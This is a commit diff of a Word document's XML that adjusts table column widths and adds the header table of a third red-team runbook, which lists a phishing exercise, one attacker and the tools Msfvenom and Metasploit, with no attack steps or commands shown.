<commit_message>
added 3rd red team runbook
</commit_message>
<xml_diff>
--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1529"/>
-        <w:gridCol w:w="493"/>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1286"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcW w:w="1528" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8115" w:type="dxa"/>
+            <w:tcW w:w="8116" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -763,7 +763,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -821,7 +821,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -849,7 +849,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -908,7 +908,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -999,7 +999,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1057,7 +1057,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1085,7 +1085,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1144,7 +1144,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1171,7 +1171,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1229,7 +1229,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1257,7 +1257,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1316,7 +1316,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1351,7 +1351,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1466,12 +1466,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1529"/>
-        <w:gridCol w:w="493"/>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1286"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1931,7 +1931,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcW w:w="1528" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1978,7 +1978,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8115" w:type="dxa"/>
+            <w:tcW w:w="8116" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2038,7 +2038,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2066,7 +2066,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2125,7 +2125,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2172,7 +2172,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2230,7 +2230,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2258,7 +2258,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2317,7 +2317,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2393,7 +2393,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2451,7 +2451,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2479,7 +2479,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2538,7 +2538,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2649,7 +2649,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2707,7 +2707,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2735,7 +2735,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2794,7 +2794,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2829,7 +2829,1373 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Runbook </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="9645" w:type="dxa"/>
+        <w:jc w:val="left"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
+        <w:gridCol w:w="2290"/>
+        <w:gridCol w:w="2290"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="497" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Document Name</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IRTx Red Run </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Version</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>V1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="417" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Author</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Dylan Wondal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Date Created</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>9/10/23</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="411" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Attack Type</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Phishing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Last Modified</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>9/10/23</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="411" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Staff Required</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>1 Attacker</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Skills Required</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Msfvenom, metasploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1834" w:hRule="atLeast"/>
+        </w:trPr>
